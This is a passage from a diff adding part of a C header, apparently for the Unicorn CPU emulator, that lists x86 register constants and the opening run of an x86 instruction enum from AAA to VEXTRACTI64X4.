UC_X86_REG_XMM13, UC_X86_REG_XMM14, + UC_X86_REG_XMM15, UC_X86_REG_XMM16, UC_X86_REG_XMM17, UC_X86_REG_XMM18, UC_X86_REG_XMM19, + UC_X86_REG_XMM20, UC_X86_REG_XMM21, UC_X86_REG_XMM22, UC_X86_REG_XMM23, UC_X86_REG_XMM24, + UC_X86_REG_XMM25, UC_X86_REG_XMM26, UC_X86_REG_XMM27, UC_X86_REG_XMM28, UC_X86_REG_XMM29, + UC_X86_REG_XMM30, UC_X86_REG_XMM31, UC_X86_REG_YMM0, UC_X86_REG_YMM1, UC_X86_REG_YMM2, + UC_X86_REG_YMM3, UC_X86_REG_YMM4, UC_X86_REG_YMM5, UC_X86_REG_YMM6, UC_X86_REG_YMM7, + UC_X86_REG_YMM8, UC_X86_REG_YMM9, UC_X86_REG_YMM10, UC_X86_REG_YMM11, UC_X86_REG_YMM12, + UC_X86_REG_YMM13, UC_X86_REG_YMM14, UC_X86_REG_YMM15, UC_X86_REG_YMM16, UC_X86_REG_YMM17, + UC_X86_REG_YMM18, UC_X86_REG_YMM19, UC_X86_REG_YMM20, UC_X86_REG_YMM21, UC_X86_REG_YMM22, + UC_X86_REG_YMM23, UC_X86_REG_YMM24, UC_X86_REG_YMM25, UC_X86_REG_YMM26, UC_X86_REG_YMM27, + UC_X86_REG_YMM28, UC_X86_REG_YMM29, UC_X86_REG_YMM30, UC_X86_REG_YMM31, UC_X86_REG_ZMM0, + UC_X86_REG_ZMM1, UC_X86_REG_ZMM2, UC_X86_REG_ZMM3, UC_X86_REG_ZMM4, UC_X86_REG_ZMM5, + UC_X86_REG_ZMM6, UC_X86_REG_ZMM7, UC_X86_REG_ZMM8, UC_X86_REG_ZMM9, UC_X86_REG_ZMM10, + UC_X86_REG_ZMM11, UC_X86_REG_ZMM12, UC_X86_REG_ZMM13, UC_X86_REG_ZMM14, UC_X86_REG_ZMM15, + UC_X86_REG_ZMM16, UC_X86_REG_ZMM17, UC_X86_REG_ZMM18, UC_X86_REG_ZMM19, UC_X86_REG_ZMM20, + UC_X86_REG_ZMM21, UC_X86_REG_ZMM22, UC_X86_REG_ZMM23, UC_X86_REG_ZMM24, UC_X86_REG_ZMM25, + UC_X86_REG_ZMM26, UC_X86_REG_ZMM27, UC_X86_REG_ZMM28, UC_X86_REG_ZMM29, UC_X86_REG_ZMM30, + UC_X86_REG_ZMM31, UC_X86_REG_R8B, UC_X86_REG_R9B, UC_X86_REG_R10B, UC_X86_REG_R11B, + UC_X86_REG_R12B, UC_X86_REG_R13B, UC_X86_REG_R14B, UC_X86_REG_R15B, UC_X86_REG_R8D, + UC_X86_REG_R9D, UC_X86_REG_R10D, UC_X86_REG_R11D, UC_X86_REG_R12D, UC_X86_REG_R13D, + UC_X86_REG_R14D, UC_X86_REG_R15D, UC_X86_REG_R8W, UC_X86_REG_R9W, UC_X86_REG_R10W, + UC_X86_REG_R11W, UC_X86_REG_R12W, UC_X86_REG_R13W, UC_X86_REG_R14W, UC_X86_REG_R15W, + UC_X86_REG_IDTR, UC_X86_REG_GDTR, UC_X86_REG_LDTR, UC_X86_REG_TR, UC_X86_REG_FPCW, + UC_X86_REG_FPTAG, + UC_X86_REG_MSR, // Model-Specific Register + UC_X86_REG_MXCSR, + UC_X86_REG_FS_BASE, // Base regs for x86_64 + UC_X86_REG_GS_BASE, + UC_X86_REG_ENDING // <-- mark the end of the list of registers +} uc_x86_reg; + +//> X86 instructions +typedef enum uc_x86_insn { + UC_X86_INS_INVALID = 0, + + UC_X86_INS_AAA, + UC_X86_INS_AAD, + UC_X86_INS_AAM, + UC_X86_INS_AAS, + UC_X86_INS_FABS, + UC_X86_INS_ADC, + UC_X86_INS_ADCX, + UC_X86_INS_ADD, + UC_X86_INS_ADDPD, + UC_X86_INS_ADDPS, + UC_X86_INS_ADDSD, + UC_X86_INS_ADDSS, + UC_X86_INS_ADDSUBPD, + UC_X86_INS_ADDSUBPS, + UC_X86_INS_FADD, + UC_X86_INS_FIADD, + UC_X86_INS_FADDP, + UC_X86_INS_ADOX, + UC_X86_INS_AESDECLAST, + UC_X86_INS_AESDEC, + UC_X86_INS_AESENCLAST, + UC_X86_INS_AESENC, + UC_X86_INS_AESIMC, + UC_X86_INS_AESKEYGENASSIST, + UC_X86_INS_AND, + UC_X86_INS_ANDN, + UC_X86_INS_ANDNPD, + UC_X86_INS_ANDNPS, + UC_X86_INS_ANDPD, + UC_X86_INS_ANDPS, + UC_X86_INS_ARPL, + UC_X86_INS_BEXTR, + UC_X86_INS_BLCFILL, + UC_X86_INS_BLCI, + UC_X86_INS_BLCIC, + UC_X86_INS_BLCMSK, + UC_X86_INS_BLCS, + UC_X86_INS_BLENDPD, + UC_X86_INS_BLENDPS, + UC_X86_INS_BLENDVPD, + UC_X86_INS_BLENDVPS, + UC_X86_INS_BLSFILL, + UC_X86_INS_BLSI, + UC_X86_INS_BLSIC, + UC_X86_INS_BLSMSK, + UC_X86_INS_BLSR, + UC_X86_INS_BOUND, + UC_X86_INS_BSF, + UC_X86_INS_BSR, + UC_X86_INS_BSWAP, + UC_X86_INS_BT, + UC_X86_INS_BTC, + UC_X86_INS_BTR, + UC_X86_INS_BTS, + UC_X86_INS_BZHI, + UC_X86_INS_CALL, + UC_X86_INS_CBW, + UC_X86_INS_CDQ, + UC_X86_INS_CDQE, + UC_X86_INS_FCHS, + UC_X86_INS_CLAC, + UC_X86_INS_CLC, + UC_X86_INS_CLD, + UC_X86_INS_CLFLUSH, + UC_X86_INS_CLFLUSHOPT, + UC_X86_INS_CLGI, + UC_X86_INS_CLI, + UC_X86_INS_CLTS, + UC_X86_INS_CLWB, + UC_X86_INS_CMC, + UC_X86_INS_CMOVA, + UC_X86_INS_CMOVAE, + UC_X86_INS_CMOVB, + UC_X86_INS_CMOVBE, + UC_X86_INS_FCMOVBE, + UC_X86_INS_FCMOVB, + UC_X86_INS_CMOVE, + UC_X86_INS_FCMOVE, + UC_X86_INS_CMOVG, + UC_X86_INS_CMOVGE, + UC_X86_INS_CMOVL, + UC_X86_INS_CMOVLE, + UC_X86_INS_FCMOVNBE, + UC_X86_INS_FCMOVNB, + UC_X86_INS_CMOVNE, + UC_X86_INS_FCMOVNE, + UC_X86_INS_CMOVNO, + UC_X86_INS_CMOVNP, + UC_X86_INS_FCMOVNU, + UC_X86_INS_CMOVNS, + UC_X86_INS_CMOVO, + UC_X86_INS_CMOVP, + UC_X86_INS_FCMOVU, + UC_X86_INS_CMOVS, + UC_X86_INS_CMP, + UC_X86_INS_CMPPD, + UC_X86_INS_CMPPS, + UC_X86_INS_CMPSB, + UC_X86_INS_CMPSD, + UC_X86_INS_CMPSQ, + UC_X86_INS_CMPSS, + UC_X86_INS_CMPSW, + UC_X86_INS_CMPXCHG16B, + UC_X86_INS_CMPXCHG, + UC_X86_INS_CMPXCHG8B, + UC_X86_INS_COMISD, + UC_X86_INS_COMISS, + UC_X86_INS_FCOMP, + UC_X86_INS_FCOMPI, + UC_X86_INS_FCOMI, + UC_X86_INS_FCOM, + UC_X86_INS_FCOS, + UC_X86_INS_CPUID, + UC_X86_INS_CQO, + UC_X86_INS_CRC32, + UC_X86_INS_CVTDQ2PD, + UC_X86_INS_CVTDQ2PS, + UC_X86_INS_CVTPD2DQ, + UC_X86_INS_CVTPD2PS, + UC_X86_INS_CVTPS2DQ, + UC_X86_INS_CVTPS2PD, + UC_X86_INS_CVTSD2SI, + UC_X86_INS_CVTSD2SS, + UC_X86_INS_CVTSI2SD, + UC_X86_INS_CVTSI2SS, + UC_X86_INS_CVTSS2SD, + UC_X86_INS_CVTSS2SI, + UC_X86_INS_CVTTPD2DQ, + UC_X86_INS_CVTTPS2DQ, + UC_X86_INS_CVTTSD2SI, + UC_X86_INS_CVTTSS2SI, + UC_X86_INS_CWD, + UC_X86_INS_CWDE, + UC_X86_INS_DAA, + UC_X86_INS_DAS, + UC_X86_INS_DATA16, + UC_X86_INS_DEC, + UC_X86_INS_DIV, + UC_X86_INS_DIVPD, + UC_X86_INS_DIVPS, + UC_X86_INS_FDIVR, + UC_X86_INS_FIDIVR, + UC_X86_INS_FDIVRP, + UC_X86_INS_DIVSD, + UC_X86_INS_DIVSS, + UC_X86_INS_FDIV, + UC_X86_INS_FIDIV, + UC_X86_INS_FDIVP, + UC_X86_INS_DPPD, + UC_X86_INS_DPPS, + UC_X86_INS_RET, + UC_X86_INS_ENCLS, + UC_X86_INS_ENCLU, + UC_X86_INS_ENTER, + UC_X86_INS_EXTRACTPS, + UC_X86_INS_EXTRQ, + UC_X86_INS_F2XM1, + UC_X86_INS_LCALL, + UC_X86_INS_LJMP, + UC_X86_INS_FBLD, + UC_X86_INS_FBSTP, + UC_X86_INS_FCOMPP, + UC_X86_INS_FDECSTP, + UC_X86_INS_FEMMS, + UC_X86_INS_FFREE, + UC_X86_INS_FICOM, + UC_X86_INS_FICOMP, + UC_X86_INS_FINCSTP, + UC_X86_INS_FLDCW, + UC_X86_INS_FLDENV, + UC_X86_INS_FLDL2E, + UC_X86_INS_FLDL2T, + UC_X86_INS_FLDLG2, + UC_X86_INS_FLDLN2, + UC_X86_INS_FLDPI, + UC_X86_INS_FNCLEX, + UC_X86_INS_FNINIT, + UC_X86_INS_FNOP, + UC_X86_INS_FNSTCW, + UC_X86_INS_FNSTSW, + UC_X86_INS_FPATAN, + UC_X86_INS_FPREM, + UC_X86_INS_FPREM1, + UC_X86_INS_FPTAN, + UC_X86_INS_FFREEP, + UC_X86_INS_FRNDINT, + UC_X86_INS_FRSTOR, + UC_X86_INS_FNSAVE, + UC_X86_INS_FSCALE, + UC_X86_INS_FSETPM, + UC_X86_INS_FSINCOS, + UC_X86_INS_FNSTENV, + UC_X86_INS_FXAM, + UC_X86_INS_FXRSTOR, + UC_X86_INS_FXRSTOR64, + UC_X86_INS_FXSAVE, + UC_X86_INS_FXSAVE64, + UC_X86_INS_FXTRACT, + UC_X86_INS_FYL2X, + UC_X86_INS_FYL2XP1, + UC_X86_INS_MOVAPD, + UC_X86_INS_MOVAPS, + UC_X86_INS_ORPD, + UC_X86_INS_ORPS, + UC_X86_INS_VMOVAPD, + UC_X86_INS_VMOVAPS, + UC_X86_INS_XORPD, + UC_X86_INS_XORPS, + UC_X86_INS_GETSEC, + UC_X86_INS_HADDPD, + UC_X86_INS_HADDPS, + UC_X86_INS_HLT, + UC_X86_INS_HSUBPD, + UC_X86_INS_HSUBPS, + UC_X86_INS_IDIV, + UC_X86_INS_FILD, + UC_X86_INS_IMUL, + UC_X86_INS_IN, + UC_X86_INS_INC, + UC_X86_INS_INSB, + UC_X86_INS_INSERTPS, + UC_X86_INS_INSERTQ, + UC_X86_INS_INSD, + UC_X86_INS_INSW, + UC_X86_INS_INT, + UC_X86_INS_INT1, + UC_X86_INS_INT3, + UC_X86_INS_INTO, + UC_X86_INS_INVD, + UC_X86_INS_INVEPT, + UC_X86_INS_INVLPG, + UC_X86_INS_INVLPGA, + UC_X86_INS_INVPCID, + UC_X86_INS_INVVPID, + UC_X86_INS_IRET, + UC_X86_INS_IRETD, + UC_X86_INS_IRETQ, + UC_X86_INS_FISTTP, + UC_X86_INS_FIST, + UC_X86_INS_FISTP, + UC_X86_INS_UCOMISD, + UC_X86_INS_UCOMISS, + UC_X86_INS_VCOMISD, + UC_X86_INS_VCOMISS, + UC_X86_INS_VCVTSD2SS, + UC_X86_INS_VCVTSI2SD, + UC_X86_INS_VCVTSI2SS, + UC_X86_INS_VCVTSS2SD, + UC_X86_INS_VCVTTSD2SI, + UC_X86_INS_VCVTTSD2USI, + UC_X86_INS_VCVTTSS2SI, + UC_X86_INS_VCVTTSS2USI, + UC_X86_INS_VCVTUSI2SD, + UC_X86_INS_VCVTUSI2SS, + UC_X86_INS_VUCOMISD, + UC_X86_INS_VUCOMISS, + UC_X86_INS_JAE, + UC_X86_INS_JA, + UC_X86_INS_JBE, + UC_X86_INS_JB, + UC_X86_INS_JCXZ, + UC_X86_INS_JECXZ, + UC_X86_INS_JE, + UC_X86_INS_JGE, + UC_X86_INS_JG, + UC_X86_INS_JLE, + UC_X86_INS_JL, + UC_X86_INS_JMP, + UC_X86_INS_JNE, + UC_X86_INS_JNO, + UC_X86_INS_JNP, + UC_X86_INS_JNS, + UC_X86_INS_JO, + UC_X86_INS_JP, + UC_X86_INS_JRCXZ, + UC_X86_INS_JS, + UC_X86_INS_KANDB, + UC_X86_INS_KANDD, + UC_X86_INS_KANDNB, + UC_X86_INS_KANDND, + UC_X86_INS_KANDNQ, + UC_X86_INS_KANDNW, + UC_X86_INS_KANDQ, + UC_X86_INS_KANDW, + UC_X86_INS_KMOVB, + UC_X86_INS_KMOVD, + UC_X86_INS_KMOVQ, + UC_X86_INS_KMOVW, + UC_X86_INS_KNOTB, + UC_X86_INS_KNOTD, + UC_X86_INS_KNOTQ, + UC_X86_INS_KNOTW, + UC_X86_INS_KORB, + UC_X86_INS_KORD, + UC_X86_INS_KORQ, + UC_X86_INS_KORTESTB, + UC_X86_INS_KORTESTD, + UC_X86_INS_KORTESTQ, + UC_X86_INS_KORTESTW, + UC_X86_INS_KORW, + UC_X86_INS_KSHIFTLB, + UC_X86_INS_KSHIFTLD, + UC_X86_INS_KSHIFTLQ, + UC_X86_INS_KSHIFTLW, + UC_X86_INS_KSHIFTRB, + UC_X86_INS_KSHIFTRD, + UC_X86_INS_KSHIFTRQ, + UC_X86_INS_KSHIFTRW, + UC_X86_INS_KUNPCKBW, + UC_X86_INS_KXNORB, + UC_X86_INS_KXNORD, + UC_X86_INS_KXNORQ, + UC_X86_INS_KXNORW, + UC_X86_INS_KXORB, + UC_X86_INS_KXORD, + UC_X86_INS_KXORQ, + UC_X86_INS_KXORW, + UC_X86_INS_LAHF, + UC_X86_INS_LAR, + UC_X86_INS_LDDQU, + UC_X86_INS_LDMXCSR, + UC_X86_INS_LDS, + UC_X86_INS_FLDZ, + UC_X86_INS_FLD1, + UC_X86_INS_FLD, + UC_X86_INS_LEA, + UC_X86_INS_LEAVE, + UC_X86_INS_LES, + UC_X86_INS_LFENCE, + UC_X86_INS_LFS, + UC_X86_INS_LGDT, + UC_X86_INS_LGS, + UC_X86_INS_LIDT, + UC_X86_INS_LLDT, + UC_X86_INS_LMSW, + UC_X86_INS_OR, + UC_X86_INS_SUB, + UC_X86_INS_XOR, + UC_X86_INS_LODSB, + UC_X86_INS_LODSD, + UC_X86_INS_LODSQ, + UC_X86_INS_LODSW, + UC_X86_INS_LOOP, + UC_X86_INS_LOOPE, + UC_X86_INS_LOOPNE, + UC_X86_INS_RETF, + UC_X86_INS_RETFQ, + UC_X86_INS_LSL, + UC_X86_INS_LSS, + UC_X86_INS_LTR, + UC_X86_INS_XADD, + UC_X86_INS_LZCNT, + UC_X86_INS_MASKMOVDQU, + UC_X86_INS_MAXPD, + UC_X86_INS_MAXPS, + UC_X86_INS_MAXSD, + UC_X86_INS_MAXSS, + UC_X86_INS_MFENCE, + UC_X86_INS_MINPD, + UC_X86_INS_MINPS, + UC_X86_INS_MINSD, + UC_X86_INS_MINSS, + UC_X86_INS_CVTPD2PI, + UC_X86_INS_CVTPI2PD, + UC_X86_INS_CVTPI2PS, + UC_X86_INS_CVTPS2PI, + UC_X86_INS_CVTTPD2PI, + UC_X86_INS_CVTTPS2PI, + UC_X86_INS_EMMS, + UC_X86_INS_MASKMOVQ, + UC_X86_INS_MOVD, + UC_X86_INS_MOVDQ2Q, + UC_X86_INS_MOVNTQ, + UC_X86_INS_MOVQ2DQ, + UC_X86_INS_MOVQ, + UC_X86_INS_PABSB, + UC_X86_INS_PABSD, + UC_X86_INS_PABSW, + UC_X86_INS_PACKSSDW, + UC_X86_INS_PACKSSWB, + UC_X86_INS_PACKUSWB, + UC_X86_INS_PADDB, + UC_X86_INS_PADDD, + UC_X86_INS_PADDQ, + UC_X86_INS_PADDSB, + UC_X86_INS_PADDSW, + UC_X86_INS_PADDUSB, + UC_X86_INS_PADDUSW, + UC_X86_INS_PADDW, + UC_X86_INS_PALIGNR, + UC_X86_INS_PANDN, + UC_X86_INS_PAND, + UC_X86_INS_PAVGB, + UC_X86_INS_PAVGW, + UC_X86_INS_PCMPEQB, + UC_X86_INS_PCMPEQD, + UC_X86_INS_PCMPEQW, + UC_X86_INS_PCMPGTB, + UC_X86_INS_PCMPGTD, + UC_X86_INS_PCMPGTW, + UC_X86_INS_PEXTRW, + UC_X86_INS_PHADDSW, + UC_X86_INS_PHADDW, + UC_X86_INS_PHADDD, + UC_X86_INS_PHSUBD, + UC_X86_INS_PHSUBSW, + UC_X86_INS_PHSUBW, + UC_X86_INS_PINSRW, + UC_X86_INS_PMADDUBSW, + UC_X86_INS_PMADDWD, + UC_X86_INS_PMAXSW, + UC_X86_INS_PMAXUB, + UC_X86_INS_PMINSW, + UC_X86_INS_PMINUB, + UC_X86_INS_PMOVMSKB, + UC_X86_INS_PMULHRSW, + UC_X86_INS_PMULHUW, + UC_X86_INS_PMULHW, + UC_X86_INS_PMULLW, + UC_X86_INS_PMULUDQ, + UC_X86_INS_POR, + UC_X86_INS_PSADBW, + UC_X86_INS_PSHUFB, + UC_X86_INS_PSHUFW, + UC_X86_INS_PSIGNB, + UC_X86_INS_PSIGND, + UC_X86_INS_PSIGNW, + UC_X86_INS_PSLLD, + UC_X86_INS_PSLLQ, + UC_X86_INS_PSLLW, + UC_X86_INS_PSRAD, + UC_X86_INS_PSRAW, + UC_X86_INS_PSRLD, + UC_X86_INS_PSRLQ, + UC_X86_INS_PSRLW, + UC_X86_INS_PSUBB, + UC_X86_INS_PSUBD, + UC_X86_INS_PSUBQ, + UC_X86_INS_PSUBSB, + UC_X86_INS_PSUBSW, + UC_X86_INS_PSUBUSB, + UC_X86_INS_PSUBUSW, + UC_X86_INS_PSUBW, + UC_X86_INS_PUNPCKHBW, + UC_X86_INS_PUNPCKHDQ, + UC_X86_INS_PUNPCKHWD, + UC_X86_INS_PUNPCKLBW, + UC_X86_INS_PUNPCKLDQ, + UC_X86_INS_PUNPCKLWD, + UC_X86_INS_PXOR, + UC_X86_INS_MONITOR, + UC_X86_INS_MONTMUL, + UC_X86_INS_MOV, + UC_X86_INS_MOVABS, + UC_X86_INS_MOVBE, + UC_X86_INS_MOVDDUP, + UC_X86_INS_MOVDQA, + UC_X86_INS_MOVDQU, + UC_X86_INS_MOVHLPS, + UC_X86_INS_MOVHPD, + UC_X86_INS_MOVHPS, + UC_X86_INS_MOVLHPS, + UC_X86_INS_MOVLPD, + UC_X86_INS_MOVLPS, + UC_X86_INS_MOVMSKPD, + UC_X86_INS_MOVMSKPS, + UC_X86_INS_MOVNTDQA, + UC_X86_INS_MOVNTDQ, + UC_X86_INS_MOVNTI, + UC_X86_INS_MOVNTPD, + UC_X86_INS_MOVNTPS, + UC_X86_INS_MOVNTSD, + UC_X86_INS_MOVNTSS, + UC_X86_INS_MOVSB, + UC_X86_INS_MOVSD, + UC_X86_INS_MOVSHDUP, + UC_X86_INS_MOVSLDUP, + UC_X86_INS_MOVSQ, + UC_X86_INS_MOVSS, + UC_X86_INS_MOVSW, + UC_X86_INS_MOVSX, + UC_X86_INS_MOVSXD, + UC_X86_INS_MOVUPD, + UC_X86_INS_MOVUPS, + UC_X86_INS_MOVZX, + UC_X86_INS_MPSADBW, + UC_X86_INS_MUL, + UC_X86_INS_MULPD, + UC_X86_INS_MULPS, + UC_X86_INS_MULSD, + UC_X86_INS_MULSS, + UC_X86_INS_MULX, + UC_X86_INS_FMUL, + UC_X86_INS_FIMUL, + UC_X86_INS_FMULP, + UC_X86_INS_MWAIT, + UC_X86_INS_NEG, + UC_X86_INS_NOP, + UC_X86_INS_NOT, + UC_X86_INS_OUT, + UC_X86_INS_OUTSB, + UC_X86_INS_OUTSD, + UC_X86_INS_OUTSW, + UC_X86_INS_PACKUSDW, + UC_X86_INS_PAUSE, + UC_X86_INS_PAVGUSB, + UC_X86_INS_PBLENDVB, + UC_X86_INS_PBLENDW, + UC_X86_INS_PCLMULQDQ, + UC_X86_INS_PCMPEQQ, + UC_X86_INS_PCMPESTRI, + UC_X86_INS_PCMPESTRM, + UC_X86_INS_PCMPGTQ, + UC_X86_INS_PCMPISTRI, + UC_X86_INS_PCMPISTRM, + UC_X86_INS_PCOMMIT, + UC_X86_INS_PDEP, + UC_X86_INS_PEXT, + UC_X86_INS_PEXTRB, + UC_X86_INS_PEXTRD, + UC_X86_INS_PEXTRQ, + UC_X86_INS_PF2ID, + UC_X86_INS_PF2IW, + UC_X86_INS_PFACC, + UC_X86_INS_PFADD, + UC_X86_INS_PFCMPEQ, + UC_X86_INS_PFCMPGE, + UC_X86_INS_PFCMPGT, + UC_X86_INS_PFMAX, + UC_X86_INS_PFMIN, + UC_X86_INS_PFMUL, + UC_X86_INS_PFNACC, + UC_X86_INS_PFPNACC, + UC_X86_INS_PFRCPIT1, + UC_X86_INS_PFRCPIT2, + UC_X86_INS_PFRCP, + UC_X86_INS_PFRSQIT1, + UC_X86_INS_PFRSQRT, + UC_X86_INS_PFSUBR, + UC_X86_INS_PFSUB, + UC_X86_INS_PHMINPOSUW, + UC_X86_INS_PI2FD, + UC_X86_INS_PI2FW, + UC_X86_INS_PINSRB, + UC_X86_INS_PINSRD, + UC_X86_INS_PINSRQ, + UC_X86_INS_PMAXSB, + UC_X86_INS_PMAXSD, + UC_X86_INS_PMAXUD, + UC_X86_INS_PMAXUW, + UC_X86_INS_PMINSB, + UC_X86_INS_PMINSD, + UC_X86_INS_PMINUD, + UC_X86_INS_PMINUW, + UC_X86_INS_PMOVSXBD, + UC_X86_INS_PMOVSXBQ, + UC_X86_INS_PMOVSXBW, + UC_X86_INS_PMOVSXDQ, + UC_X86_INS_PMOVSXWD, + UC_X86_INS_PMOVSXWQ, + UC_X86_INS_PMOVZXBD, + UC_X86_INS_PMOVZXBQ, + UC_X86_INS_PMOVZXBW, + UC_X86_INS_PMOVZXDQ, + UC_X86_INS_PMOVZXWD, + UC_X86_INS_PMOVZXWQ, + UC_X86_INS_PMULDQ, + UC_X86_INS_PMULHRW, + UC_X86_INS_PMULLD, + UC_X86_INS_POP, + UC_X86_INS_POPAW, + UC_X86_INS_POPAL, + UC_X86_INS_POPCNT, + UC_X86_INS_POPF, + UC_X86_INS_POPFD, + UC_X86_INS_POPFQ, + UC_X86_INS_PREFETCH, + UC_X86_INS_PREFETCHNTA, + UC_X86_INS_PREFETCHT0, + UC_X86_INS_PREFETCHT1, + UC_X86_INS_PREFETCHT2, + UC_X86_INS_PREFETCHW, + UC_X86_INS_PSHUFD, + UC_X86_INS_PSHUFHW, + UC_X86_INS_PSHUFLW, + UC_X86_INS_PSLLDQ, + UC_X86_INS_PSRLDQ, + UC_X86_INS_PSWAPD, + UC_X86_INS_PTEST, + UC_X86_INS_PUNPCKHQDQ, + UC_X86_INS_PUNPCKLQDQ, + UC_X86_INS_PUSH, + UC_X86_INS_PUSHAW, + UC_X86_INS_PUSHAL, + UC_X86_INS_PUSHF, + UC_X86_INS_PUSHFD, + UC_X86_INS_PUSHFQ, + UC_X86_INS_RCL, + UC_X86_INS_RCPPS, + UC_X86_INS_RCPSS, + UC_X86_INS_RCR, + UC_X86_INS_RDFSBASE, + UC_X86_INS_RDGSBASE, + UC_X86_INS_RDMSR, + UC_X86_INS_RDPMC, + UC_X86_INS_RDRAND, + UC_X86_INS_RDSEED, + UC_X86_INS_RDTSC, + UC_X86_INS_RDTSCP, + UC_X86_INS_ROL, + UC_X86_INS_ROR, + UC_X86_INS_RORX, + UC_X86_INS_ROUNDPD, + UC_X86_INS_ROUNDPS, + UC_X86_INS_ROUNDSD, + UC_X86_INS_ROUNDSS, + UC_X86_INS_RSM, + UC_X86_INS_RSQRTPS, + UC_X86_INS_RSQRTSS, + UC_X86_INS_SAHF, + UC_X86_INS_SAL, + UC_X86_INS_SALC, + UC_X86_INS_SAR, + UC_X86_INS_SARX, + UC_X86_INS_SBB, + UC_X86_INS_SCASB, + UC_X86_INS_SCASD, + UC_X86_INS_SCASQ, + UC_X86_INS_SCASW, + UC_X86_INS_SETAE, + UC_X86_INS_SETA, + UC_X86_INS_SETBE, + UC_X86_INS_SETB, + UC_X86_INS_SETE, + UC_X86_INS_SETGE, + UC_X86_INS_SETG, + UC_X86_INS_SETLE, + UC_X86_INS_SETL, + UC_X86_INS_SETNE, + UC_X86_INS_SETNO, + UC_X86_INS_SETNP, + UC_X86_INS_SETNS, + UC_X86_INS_SETO, + UC_X86_INS_SETP, + UC_X86_INS_SETS, + UC_X86_INS_SFENCE, + UC_X86_INS_SGDT, + UC_X86_INS_SHA1MSG1, + UC_X86_INS_SHA1MSG2, + UC_X86_INS_SHA1NEXTE, + UC_X86_INS_SHA1RNDS4, + UC_X86_INS_SHA256MSG1, + UC_X86_INS_SHA256MSG2, + UC_X86_INS_SHA256RNDS2, + UC_X86_INS_SHL, + UC_X86_INS_SHLD, + UC_X86_INS_SHLX, + UC_X86_INS_SHR, + UC_X86_INS_SHRD, + UC_X86_INS_SHRX, + UC_X86_INS_SHUFPD, + UC_X86_INS_SHUFPS, + UC_X86_INS_SIDT, + UC_X86_INS_FSIN, + UC_X86_INS_SKINIT, + UC_X86_INS_SLDT, + UC_X86_INS_SMSW, + UC_X86_INS_SQRTPD, + UC_X86_INS_SQRTPS, + UC_X86_INS_SQRTSD, + UC_X86_INS_SQRTSS, + UC_X86_INS_FSQRT, + UC_X86_INS_STAC, + UC_X86_INS_STC, + UC_X86_INS_STD, + UC_X86_INS_STGI, + UC_X86_INS_STI, + UC_X86_INS_STMXCSR, + UC_X86_INS_STOSB, + UC_X86_INS_STOSD, + UC_X86_INS_STOSQ, + UC_X86_INS_STOSW, + UC_X86_INS_STR, + UC_X86_INS_FST, + UC_X86_INS_FSTP, + UC_X86_INS_FSTPNCE, + UC_X86_INS_FXCH, + UC_X86_INS_SUBPD, + UC_X86_INS_SUBPS, + UC_X86_INS_FSUBR, + UC_X86_INS_FISUBR, + UC_X86_INS_FSUBRP, + UC_X86_INS_SUBSD, + UC_X86_INS_SUBSS, + UC_X86_INS_FSUB, + UC_X86_INS_FISUB, + UC_X86_INS_FSUBP, + UC_X86_INS_SWAPGS, + UC_X86_INS_SYSCALL, + UC_X86_INS_SYSENTER, + UC_X86_INS_SYSEXIT, + UC_X86_INS_SYSRET, + UC_X86_INS_T1MSKC, + UC_X86_INS_TEST, + UC_X86_INS_UD2, + UC_X86_INS_FTST, + UC_X86_INS_TZCNT, + UC_X86_INS_TZMSK, + UC_X86_INS_FUCOMPI, + UC_X86_INS_FUCOMI, + UC_X86_INS_FUCOMPP, + UC_X86_INS_FUCOMP, + UC_X86_INS_FUCOM, + UC_X86_INS_UD2B, + UC_X86_INS_UNPCKHPD, + UC_X86_INS_UNPCKHPS, + UC_X86_INS_UNPCKLPD, + UC_X86_INS_UNPCKLPS, + UC_X86_INS_VADDPD, + UC_X86_INS_VADDPS, + UC_X86_INS_VADDSD, + UC_X86_INS_VADDSS, + UC_X86_INS_VADDSUBPD, + UC_X86_INS_VADDSUBPS, + UC_X86_INS_VAESDECLAST, + UC_X86_INS_VAESDEC, + UC_X86_INS_VAESENCLAST, + UC_X86_INS_VAESENC, + UC_X86_INS_VAESIMC, + UC_X86_INS_VAESKEYGENASSIST, + UC_X86_INS_VALIGND, + UC_X86_INS_VALIGNQ, + UC_X86_INS_VANDNPD, + UC_X86_INS_VANDNPS, + UC_X86_INS_VANDPD, + UC_X86_INS_VANDPS, + UC_X86_INS_VBLENDMPD, + UC_X86_INS_VBLENDMPS, + UC_X86_INS_VBLENDPD, + UC_X86_INS_VBLENDPS, + UC_X86_INS_VBLENDVPD, + UC_X86_INS_VBLENDVPS, + UC_X86_INS_VBROADCASTF128, + UC_X86_INS_VBROADCASTI32X4, + UC_X86_INS_VBROADCASTI64X4, + UC_X86_INS_VBROADCASTSD, + UC_X86_INS_VBROADCASTSS, + UC_X86_INS_VCMPPD, + UC_X86_INS_VCMPPS, + UC_X86_INS_VCMPSD, + UC_X86_INS_VCMPSS, + UC_X86_INS_VCOMPRESSPD, + UC_X86_INS_VCOMPRESSPS, + UC_X86_INS_VCVTDQ2PD, + UC_X86_INS_VCVTDQ2PS, + UC_X86_INS_VCVTPD2DQX, + UC_X86_INS_VCVTPD2DQ, + UC_X86_INS_VCVTPD2PSX, + UC_X86_INS_VCVTPD2PS, + UC_X86_INS_VCVTPD2UDQ, + UC_X86_INS_VCVTPH2PS, + UC_X86_INS_VCVTPS2DQ, + UC_X86_INS_VCVTPS2PD, + UC_X86_INS_VCVTPS2PH, + UC_X86_INS_VCVTPS2UDQ, + UC_X86_INS_VCVTSD2SI, + UC_X86_INS_VCVTSD2USI, + UC_X86_INS_VCVTSS2SI, + UC_X86_INS_VCVTSS2USI, + UC_X86_INS_VCVTTPD2DQX, + UC_X86_INS_VCVTTPD2DQ, + UC_X86_INS_VCVTTPD2UDQ, + UC_X86_INS_VCVTTPS2DQ, + UC_X86_INS_VCVTTPS2UDQ, + UC_X86_INS_VCVTUDQ2PD, + UC_X86_INS_VCVTUDQ2PS, + UC_X86_INS_VDIVPD, + UC_X86_INS_VDIVPS, + UC_X86_INS_VDIVSD, + UC_X86_INS_VDIVSS, + UC_X86_INS_VDPPD, + UC_X86_INS_VDPPS, + UC_X86_INS_VERR, + UC_X86_INS_VERW, + UC_X86_INS_VEXP2PD, + UC_X86_INS_VEXP2PS, + UC_X86_INS_VEXPANDPD, + UC_X86_INS_VEXPANDPS, + UC_X86_INS_VEXTRACTF128, + UC_X86_INS_VEXTRACTF32X4, + UC_X86_INS_VEXTRACTF64X4, + UC_X86_INS_VEXTRACTI128, + UC_X86_INS_VEXTRACTI32X4, + UC_X86_INS_VEXTRACTI64X4, + 